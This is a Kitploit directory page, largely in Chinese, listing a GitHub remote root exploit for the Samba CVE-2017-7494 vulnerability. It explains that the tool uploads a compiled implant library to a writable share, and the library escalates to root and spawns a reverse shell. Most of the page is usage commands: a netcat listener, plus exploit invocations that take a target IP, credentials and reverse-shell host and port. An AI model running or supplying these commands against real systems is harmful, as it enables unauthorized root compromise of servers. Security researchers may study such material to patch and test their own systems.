Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-7494 — Remote root exploit for the SAMBA CVE-2017-7494 vulnerability | Kitploit
工具/GitHubGitHub/joxeankoret/cve-2017-7494
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access ToolArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

查看仓库
259745年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-7494

针对 SAMBA CVE-2017-7494 漏洞的远程 root 漏洞利用。

详情

该漏洞利用分为两部分:

  • 首先,编译一个名为 "implant.c" 的载荷,并生成一个库文件(libimplantx32.so 或 libimplantx64.so),该库文件会切换至 root 用户,从父进程中分离,并产生一个反弹 shell。
  • 其次,在指定的目标主机上找到一个可写共享,以随机名称上传该库文件,并尝试加载它。

只要目标存在漏洞,且载荷与目标操作系统及架构相匹配,该漏洞利用 100% 可靠。

使用方法

在你的机器上运行以下命令:

root@kitploit:~
$ nc -p 31337 -l

然后,对目标运行漏洞利用,等待它连接回你的 Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

如果你过快关闭反弹 shell,无需重新运行漏洞利用并再次上传模块等,可以直接传递之前已上传模块的路径。假设模块已上传至 /shared/directory/ 并命名为 "module.so",则可运行如下命令:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

更新于 2017年11月25日 - Archivaldo

你现在可以对 samba 3.5.0 和 3.6.0 运行漏洞利用,只需添加参数 -o 1:

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

你现在可以使用自定义的 .so 文件:

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

如果需要在 x86 机器上运行此脚本,编译植入二进制文件将生成两个 x86 文件。使用参数 -n 1 可禁用编译,并从另一台机器复制 libimplantx64.so。

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

如果 samba 仅在 139 端口上运行,可以使用参数 -p 设置远程服务器端口:

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

备注

我不再维护此工具。

-- Joxean Koret

下载工具